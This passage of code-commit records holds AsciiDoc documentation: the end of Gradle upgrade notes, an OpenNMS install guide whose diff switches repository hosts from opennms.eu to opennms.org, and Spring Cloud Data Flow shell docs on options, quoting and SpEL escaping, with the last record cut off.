0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affect the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and that you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can workaround by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error prone so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follow the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions are no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b5be30422cda9b4a402ce2828e4a76f732472e9","subject":"HZN-185: Fix repository","message":"HZN-185: Fix repository\n\nChanged to use by default opennms.org server","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/introduction.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/introduction.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-basic-install-opennms]]\n== Basic Installation of OpenNMS\n\nThe _OpenNMS_ platform can be installed in several ways.\nThis guide describes the installation of the platform on _RHEL-_, _Debian-_ and _Microsoft Windows_ based operation systems.\nInstallable pre-compiled software packages are provided through _RPM_ and _Debian_ repository servers.\nRunning _OpenNMS_ requires the following components:\n\n* Internet access to download and verify installation packages from public repository server\n* Installed <<gi-install-oracle-java, Oracle Java 8>> environment\n* PostgreSQL 9.1+ data base\n* Set link to section which describes to install with RRDTool.\n Optional link:http:\/\/oss.oetiker.ch\/rrdtool\/[RRDtool] to persist long term performance data\n\nNOTE: _OpenJDK 8_ can be used, but for production and critical environment _Oracle Java 8_ is recommended.\n\nNOTE: `${OPENNMS_HOME}` is referred to the path _OpenNMS_ is installed to.\n On _RHEL-based_ systems it is `\/opt\/opennms` on _Debian-based_ systems it is `\/usr\/share\/opennms`.\n The environment in _Microsoft Windows_ can refer to `C:\\Program Files\\opennms`\n\nWith an _opennms_ meta package all dependencies for the components mentioned above are maintained.\nThe following sections describe to install _OpenNMS_ on a single system.\nDependencies for _Java_ and the _PostgreSQL_ data base are maintained with the _opennms_ meta installation package.\n\n[[gi-install-opennms-repo-releases]]\n=== Repositories for Releases\n\nInstallation packages are available for different releases of _OpenNMS_.\nThe configuration of the repository decides which _OpenNMS_ release will be installed.\n\nThe following release are available to be installed\n\n._OpenNMS_ release name convention\n[options=\"header, autowidth\"]\n|===\n| Release | Description\n| `stable` | Latest stable release\n| `testing` | Release candidate for next stable\n| `snapshot` | Latest successful develop build\n| `branches\/${BRANCH-NAME}` | Install from a specific branch name, e.g. `branches\/features-newts` installs the repository for the _Newts_ development branch.\n Branches can be found in http:\/\/yum.opennms.org\/branches\/ or http:\/\/debian.opennms.org\/dists\/branches\/\n| `branches\/${RELEASE}` | Install a specific release, e.g. `branches\/release-14.0.3`.\n This release branches are also found in http:\/\/yum.opennms.org\/branches\/ or http:\/\/debian.opennms.org\/dists\/branches\/\n|===\n\nTo install a different release the repository files have to be installed and manually modified.\n\n==== Specific Release on RHEL-based system\n\n.Installation of release specific repositories\n[source, shell]\n----\nrpm -Uvh http:\/\/yum.opennms.org\/repofiles\/opennms-repo-${RELEASE}-rhel7.noarch.rpm<1>\nrpm --import http:\/\/yum.opennms.org\/OPENNMS-GPG-KEY\n----\n\n<1> Replace `${RELEASE}` with a release name like `testing` or `snapshot`.\n\nInstall _OpenNMS_ with _YUM_ following the normal installation procedure.\n\n.Installation of the full _OpenNMS_ application with all dependencies\n[source, shell]\n----\nyum install opennms\n----\n\nTIP: Verify the release of _OpenNMS_ packages with `yum info opennms`.\n\n==== Specific Release on Debian-based system\n\nCreate a new apt source file (eg: `\/etc\/apt\/sources.list.d\/opennms.list`), and add the following 2 lines:\n\n.Package repository configuration for Debian-based systems\n[source, shell]\n----\ndeb http:\/\/debian.opennms.org ${RELEASE} main <1>\ndeb-src http:\/\/debian.opennms.org ${RELEASE} main <1>\n----\n\n<1> Replace `${RELEASE}` with a release name like `testing` or `snapshot`.\n\nImport the packages' authentication key with the following command:\n\n.GPG key import for Debian-based systems\n[source, shell]\n----\nwget -O - http:\/\/debian.opennms.org\/OPENNMS-GPG-KEY | apt-key add -\n----\n\nRun `apt-get update`and install _OpenNMS_ with _apt_ following the normal installation procedure.\n\nTIP: Verify the release of _OpenNMS_ packages with `apt-cache show opennms`.\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-basic-install-opennms]]\n== Basic Installation of OpenNMS\n\nThe _OpenNMS_ platform can be installed in several ways.\nThis guide describes the installation of the platform on _RHEL-_, _Debian-_ and _Microsoft Windows_ based operation systems.\nInstallable pre-compiled software packages are provided through _RPM_ and _Debian_ repository servers.\nRunning _OpenNMS_ requires the following components:\n\n* Internet access to download and verify installation packages from public repository server\n* Installed <<gi-install-oracle-java, Oracle Java 8>> environment\n* PostgreSQL 9.1+ data base\n* Set link to section which describes to install with RRDTool.\n Optional link:http:\/\/oss.oetiker.ch\/rrdtool\/[RRDtool] to persist long term performance data\n\nNOTE: _OpenJDK 8_ can be used, but for production and critical environment _Oracle Java 8_ is recommended.\n\nNOTE: `${OPENNMS_HOME}` is referred to the path _OpenNMS_ is installed to.\n On _RHEL-based_ systems it is `\/opt\/opennms` on _Debian-based_ systems it is `\/usr\/share\/opennms`.\n The environment in _Microsoft Windows_ can refer to `C:\\Program Files\\opennms`\n\nWith an _opennms_ meta package all dependencies for the components mentioned above are maintained.\nThe following sections describe to install _OpenNMS_ on a single system.\nDependencies for _Java_ and the _PostgreSQL_ data base are maintained with the _opennms_ meta installation package.\n\n[[gi-install-opennms-repo-releases]]\n=== Repositories for Releases\n\nInstallation packages are available for different releases of _OpenNMS_.\nThe configuration of the repository decides which _OpenNMS_ release will be installed.\n\nThe following release are available to be installed\n\n._OpenNMS_ release name convention\n[options=\"header, autowidth\"]\n|===\n| Release | Description\n| `stable` | Latest stable release\n| `testing` | Release candidate for next stable\n| `snapshot` | Latest successful develop build\n| `branches\/${BRANCH-NAME}` | Install from a specific branch name, e.g. `branches\/features-newts` installs the repository for the _Newts_ development branch.\n Branches can be found in http:\/\/yum.opennms.org\/branches\/ or http:\/\/debian.opennms.org\/dists\/branches\/\n| `branches\/${RELEASE}` | Install a specific release, e.g. `branches\/release-14.0.3`.\n This release branches are also found in http:\/\/yum.opennms.org\/branches\/ or http:\/\/debian.opennms.org\/dists\/branches\/\n|===\n\nTo install a different release the repository files have to be installed and manually modified.\n\n==== Specific Release on RHEL-based system\n\n.Installation of release specific repositories\n[source, shell]\n----\nrpm -Uvh http:\/\/yum.opennms.org\/repofiles\/opennms-repo-${RELEASE}-rhel7.noarch.rpm<1>\nrpm --import http:\/\/yum.opennms.org\/OPENNMS-GPG-KEY\n----\n\n<1> Replace `${RELEASE}` with a release name like `testing` or `snapshot`.\n\nInstall _OpenNMS_ with _YUM_ following the normal installation procedure.\n\n.Installation of the full _OpenNMS_ application with all dependencies\n[source, shell]\n----\nyum install opennms\n----\n\nTIP: Verify the release of _OpenNMS_ packages with `yum info opennms`.\n\n==== Specific Release on Debian-based system\n\nCreate a new apt source file (eg: `\/etc\/apt\/sources.list.d\/opennms.list`), and add the following 2 lines:\n\n.Package repository configuration for Debian-based systems\n[source, shell]\n----\ndeb http:\/\/debian.opennms.eu ${RELEASE} main <1>\ndeb-src http:\/\/debian.opennms.eu ${RELEASE} main <1>\n----\n\n<1> Replace `${RELEASE}` with a release name like `testing` or `snapshot`.\n\nImport the packages' authentication key with the following command:\n\n.GPG key import for Debian-based systems\n[source, shell]\n----\nwget -O - http:\/\/debian.opennms.eu\/OPENNMS-GPG-KEY | apt-key add -\n----\n\nRun `apt-get update`and install _OpenNMS_ with _apt_ following the normal installation procedure.\n\nTIP: Verify the release of _OpenNMS_ packages with `apt-cache show opennms`.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ca35c53106a40b4c8a16f69a7146ced1d3a64df2","subject":"Extend the escape and quoting rules","message":"Extend the escape and quoting rules\n","repos":"spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,trisberg\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,markfisher\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,markfisher\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,mminella\/spring-cloud-data,markpollack\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,mminella\/spring-cloud-data,markfisher\/spring-cloud-dataflow,markfisher\/spring-cloud-data,markpollack\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,markpollack\/spring-cloud-dataflow,markfisher\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow","old_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/shell.adoc","new_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/shell.adoc","new_contents":"[[shell]]\n= Shell\n\n[partintro]\n--\nThis section covers the options for starting the shell and more advanced functionality relating to how the shell handles white spaces, quotes, and interpretation of SpEL expressions.\nThe introductory chapters to the\n<<spring-cloud-dataflow-stream-intro, Stream DSL>> and <<spring-cloud-dataflow-composed-tasks, Composed Task DSL>> are good places to start for the most common usage of shell commands.\n--\n\n[[shell-options]]\n== Shell Options\nThe shell is built upon the link:https:\/\/projects.spring.io\/spring-shell\/[Spring Shell] project.\nThere are command line options generic to Spring Shell and some specific to Data Flow.\nThe shell takes the following command line options\n\n[source,bash,options=\"nowrap\",subs=attributes]\n----\nunix:>java -jar spring-cloud-dataflow-shell-{project-version}.jar --help\nData Flow Options:\n --dataflow.uri=<uri> Address of the Data Flow Server [default: http:\/\/localhost:9393].\n --dataflow.username=<USER> Username of the Data Flow Server [no default].\n --dataflow.password=<PASSWORD> Password of the Data Flow Server [no default].\n --dataflow.credentials-provider-command=<COMMAND> Executes an external command which must return an\n OAuth Bearer Token (Access Token prefixed with 'Bearer '),\n e.g. 'Bearer 12345'), [no default].\n --dataflow.skip-ssl-validation=<true|false> Accept any SSL certificate (even self-signed) [default: no].\n --dataflow.proxy.uri=<PROXY-URI> Address of an optional proxy server to use [no default].\n --dataflow.proxy.username=<PROXY-USERNAME> Username of the proxy server (if required by proxy server) [no default].\n --dataflow.proxy.password=<PROXY-PASSWORD> Password of the proxy server (if required by proxy server) [no default].\n --spring.shell.historySize=<SIZE> Default size of the shell log file [default: 3000].\n --spring.shell.commandFile=<FILE> Data Flow Shell executes commands read from the file(s) and then exits.\n --help This message.\n----\n\nThe `spring.shell.commandFile` option can be used to point to an existing file that contains\nall the shell commands to deploy one or many related streams and tasks. This is useful when creating some scripts to\nhelp automate deployment.\n\nAlso, the following shell command helps to modularize a complex script into multiple independent files:\n\n`dataflow:>script --file <YOUR_AWESOME_SCRIPT>`\n\n[[shell-commands]]\n== Listing Available Commands\n\nTyping `help` at the command prompt gives a listing of all available commands.\nMost of the commands are for Data Flow functionality, but a few are general purpose.\n[source,bash]\n----\n! - Allows execution of operating system (OS) commands\nclear - Clears the console\ncls - Clears the console\ndate - Displays the local date and time\nexit - Exits the shell\nhttp get - Make GET request to http endpoint\nhttp post - POST data to http endpoint\nquit - Exits the shell\nsystem properties - Shows the shell's properties\nversion - Displays shell version\n----\n\nAdding the name of the command to `help` shows additional information on how to invoke the command.\n[source,bash]\n----\ndataflow:>help stream create\nKeyword: stream create\nDescription: Create a new stream definition\n Keyword: ** default **\n Keyword: name\n Help: the name to give to the stream\n Mandatory: true\n Default if specified: '__NULL__'\n Default if unspecified: '__NULL__'\n\n Keyword: definition\n Help: a stream definition, using the DSL (e.g. \"http --port=9000 | hdfs\")\n Mandatory: true\n Default if specified: '__NULL__'\n Default if unspecified: '__NULL__'\n\n Keyword: deploy\n Help: whether to deploy the stream immediately\n Mandatory: false\n Default if specified: 'true'\n Default if unspecified: 'false'\n----\n\n[[shell-tab-completion]]\n== Tab Completion\n\nThe shell command options can be completed in the shell by pressing the `TAB` key after the leading `--`. For example, pressing `TAB` after `stream create --` results in\n```\ndataflow:>stream create --\nstream create --definition stream create --name\n```\n\nIf you type `--de` and then hit tab, `--definition` will be expanded.\n\nTab completion is also available inside the stream or composed task DSL expression for application or task properties. You can also use `TAB` to get hints in a stream DSL expression for what available sources, processors, or sinks can be used.\n\n[[shell-white-space]]\n== White Space and Quoting Rules\n\nIt is only necessary to quote parameter values if they contain spaces or the `|` character. The following example passes a SpEL expression (which is applied to any data it encounters) to a transform processor:\n\n`transform --expression='new StringBuilder(payload).reverse()'`\n\nIf the parameter value needs to embed a single quote, use two single quotes, as follows:\n\n[source]\n\/\/ Query is: Select * from \/Customers where name='Smith'\nscan --query='Select * from \/Customers where name=''Smith'''\n\n\n[[dsl-quotes-escaping]]\n=== Quotes and Escaping\n\nThere is a Spring Shell-based client that talks to the Data Flow Server and is responsible for *parsing* the DSL.\nIn turn, applications may have applications properties that rely on embedded languages, such as the *Spring Expression Language*.\n\nThe shell, Data Flow DSL parser, and SpEL have rules about how they handle quotes and how syntax escaping works.\nWhen combined together, confusion may arise.\nThis section explains the rules that apply and provides examples of the most complicated situations you may encounter when all three components are involved.\n\n[NOTE]\n.It's not always that complicated\n====\nIf you do not use the Data Flow shell (for example, you use the REST API directly) or if application properties are not SpEL expressions, then the escaping rules are simpler.\n====\n\n==== Shell rules\nArguably, the most complex component when it comes to quotes is the shell. The rules can be laid out quite simply, though:\n\n* A shell command is made of keys (`--something`) and corresponding values. There is a special, keyless mapping, though, which is described later.\n* A value cannot normally contain spaces, as space is the default delimiter for commands.\n* Spaces can be added though, by surrounding the value with quotes (either single (`'`) or double (`\"`) quotes).\n* Values passed inside deployment properties (e.g. `deployment <stream-name> --properties \" ...\"`) should not be quoted again.\n* If surrounded with quotes, a value can embed a literal quote of the same kind by prefixing it with a backslash (`\\`).\n* Other escapes are available, such as `\\t`, `\\n`, `\\r`, `\\f` and unicode escapes of the form `\\uxxxx`.\n* The keyless mapping is handled in a special way such that it does not need quoting to contain spaces.\n\nFor example, the shell supports the `!` command to execute native shell commands. The `!` accepts a single keyless argument. This is why the following works:\n----\ndataflow:>! rm something\n----\nThe argument here is the whole `rm something` string, which is passed as is to the underlying shell.\n\nAs another example, the following commands are strictly equivalent, and the argument value is `something` (without the quotes):\n----\ndataflow:>stream destroy something\ndataflow:>stream destroy --name something\ndataflow:>stream destroy \"something\"\ndataflow:>stream destroy --name \"something\"\n----\n\n==== Property files rules\nRules are relaxed when loading the properties from files.\n* The special characters used in property files (both Java and YAML) needs to be escaped. For example `\\` should be replaced by `\\\\`, '\\t` by `\\\\t` and so forth.\n* For Java property files (`--propertiesFile` <FILE_PATH>.properties) the property values should not be surrounded by quotes! It is not needed even if they contain spaces.\n----\nfilter.expression=payload > 5\n----\n* For YAML property files (`--propertiesFile` <FILE_PATH>.yaml), though, the values need to be surrounded by double quotes.\n----\napp:\n filter:\n filter:\n expression: \"payload > 5\"\n----\n\n==== DSL Parsing Rules\nAt the parser level (that is, inside the body of a stream or task definition) the rules are as follows:\n\n* Option values are normally parsed until the first space character.\n* They can be made of literal strings, though, surrounded by single or double quotes.\n* To embed such a quote, use two consecutive quotes of the desired kind.\n\nAs such, the values of the `--expression` option to the filter application are semantically equivalent in the following examples:\n----\nfilter --expression=payload>5\nfilter --expression=\"payload>5\"\nfilter --expression='payload>5'\nfilter --expression='payload > 5'\n----\n\nArguably, the last one is more readable. It is made possible thanks to the surrounding quotes. The actual expression is `payload > 5` (without quotes).\n\nNow, imagine that we want to test against string messages. If we want to compare the payload to the SpEL literal string, `\"something\"`, we could use the following:\n----\nfilter --expression=payload=='something' <1>\nfilter --expression='payload == ''something''' <2>\nfilter --expression='payload == \"something\"' <3>\n----\n<1> This works because there are no spaces. It is not very legible, though.\n<2> This uses single quotes to protect the whole argument. Hence, the actual single quotes need to be doubled.\n<3> SpEL recognizes String literals with either single or double quotes, so this last method is arguably the most readable.\n\nPlease note that the preceding examples are to be considered outside of the shell (for example, when calling the REST API directly).\nWhen entered inside the shell, chances are that the whole stream definition is itself inside double quotes, which would need to be escaped. The whole example then becomes the following:\n----\ndataflow:>stream create something --definition \"http | filter --expression=payload='something' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == ''something''' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == \\\"something\\\"' | log\"\n----\n\n\n\n==== SpEL Syntax and SpEL Literals\nThe last piece of the puzzle is about SpEL expressions.\nMany applications accept options that are to be interpreted as SpEL expressions, and, as seen above, String literals are handled in a special way there, too. The rules are as follows:\n\n* Literals can be enclosed in either single or double quotes.\n* Quotes need to be doubled to embed a literal quote. Single quotes inside double quotes need no special treatment, and the reverse is also true.\n\nAs a last example, assume you want to use the link:${scs-app-starters-docs}\/spring-cloud-stream-modules-processors.html#spring-clound-stream-modules-transform-processor[transform processor].\nThis processor accepts an `expression` option which is a SpEL expression. It is to be evaluated against the incoming message, with a default of `payload` (which forwards the message payload untouched).\n\nIt is important to understand that the following statements are equivalent:\n----\ntransform --expression=payload\ntransform --expression='payload'\n----\n\nHowever, they are different from the following (and variations upon them):\n----\ntransform --expression=\"'payload'\"\ntransform --expression='''payload'''\n----\n\nThe first series evaluates to the message payload, while the latter examples evaluate to the literal string, `payload`, (again, without quotes).\n\n==== Putting It All Together\nAs a last, complete example, consider how one could force the transformation of all messages to the string literal, `hello world`, by creating a stream in the context of the Data Flow shell:\n\/\/ asciidoctor note: callouts don't work here, they mess up the TOC for some reason\n----\ndataflow:>stream create something --definition \"http | transform --expression='''hello world''' | log\" <1>\n\ndataflow:>stream create something --definition \"http | transform --expression='\\\"hello world\\\"' | log\" <2>\n\ndataflow:>stream create something --definition \"http | transform --expression=\\\"'hello world'\\\" | log\" <2>\n----\n<1> In the first line, there are single quotes around the string (at the Data Flow parser level), but they need to be doubled because they are inside a string literal (started by the first single quote after the equals sign).\n<2> The second and third lines, use single and double quotes respectively to encompass the whole string at the Data Flow parser level. Consequently, the other kind of quote can be used inside the string. The whole thing is inside the `--definition` argument to the shell, though, which uses double quotes. Consequently, double quotes are escaped (at the shell level)\n\n","old_contents":"[[shell]]\n= Shell\n\n[partintro]\n--\nThis section covers the options for starting the shell and more advanced functionality relating to how the shell handles white spaces, quotes, and interpretation of SpEL expressions.\nThe introductory chapters to the\n<<spring-cloud-dataflow-stream-intro, Stream DSL>> and <<spring-cloud-dataflow-composed-tasks, Composed Task DSL>> are good places to start for the most common usage of shell commands.\n--\n\n[[shell-options]]\n== Shell Options\nThe shell is built upon the link:https:\/\/projects.spring.io\/spring-shell\/[Spring Shell] project.\nThere are command line options generic to Spring Shell and some specific to Data Flow.\nThe shell takes the following command line options\n\n[source,bash,options=\"nowrap\",subs=attributes]\n----\nunix:>java -jar spring-cloud-dataflow-shell-{project-version}.jar --help\nData Flow Options:\n --dataflow.uri=<uri> Address of the Data Flow Server [default: http:\/\/localhost:9393].\n --dataflow.username=<USER> Username of the Data Flow Server [no default].\n --dataflow.password=<PASSWORD> Password of the Data Flow Server [no default].\n --dataflow.credentials-provider-command=<COMMAND> Executes an external command which must return an\n OAuth Bearer Token (Access Token prefixed with 'Bearer '),\n e.g. 'Bearer 12345'), [no default].\n --dataflow.skip-ssl-validation=<true|false> Accept any SSL certificate (even self-signed) [default: no].\n --dataflow.proxy.uri=<PROXY-URI> Address of an optional proxy server to use [no default].\n --dataflow.proxy.username=<PROXY-USERNAME> Username of the proxy server (if required by proxy server) [no default].\n --dataflow.proxy.password=<PROXY-PASSWORD> Password of the proxy server (if required by proxy server) [no default].\n --spring.shell.historySize=<SIZE> Default size of the shell log file [default: 3000].\n --spring.shell.commandFile=<FILE> Data Flow Shell executes commands read from the file(s) and then exits.\n --help This message.\n----\n\nThe `spring.shell.commandFile` option can be used to point to an existing file that contains\nall the shell commands to deploy one or many related streams and tasks. This is useful when creating some scripts to\nhelp automate deployment.\n\nAlso, the following shell command helps to modularize a complex script into multiple independent files:\n\n`dataflow:>script --file <YOUR_AWESOME_SCRIPT>`\n\n[[shell-commands]]\n== Listing Available Commands\n\nTyping `help` at the command prompt gives a listing of all available commands.\nMost of the commands are for Data Flow functionality, but a few are general purpose.\n[source,bash]\n----\n! - Allows execution of operating system (OS) commands\nclear - Clears the console\ncls - Clears the console\ndate - Displays the local date and time\nexit - Exits the shell\nhttp get - Make GET request to http endpoint\nhttp post - POST data to http endpoint\nquit - Exits the shell\nsystem properties - Shows the shell's properties\nversion - Displays shell version\n----\n\nAdding the name of the command to `help` shows additional information on how to invoke the command.\n[source,bash]\n----\ndataflow:>help stream create\nKeyword: stream create\nDescription: Create a new stream definition\n Keyword: ** default **\n Keyword: name\n Help: the name to give to the stream\n Mandatory: true\n Default if specified: '__NULL__'\n Default if unspecified: '__NULL__'\n\n Keyword: definition\n Help: a stream definition, using the DSL (e.g. \"http --port=9000 | hdfs\")\n Mandatory: true\n Default if specified: '__NULL__'\n Default if unspecified: '__NULL__'\n\n Keyword: deploy\n Help: whether to deploy the stream immediately\n Mandatory: false\n Default 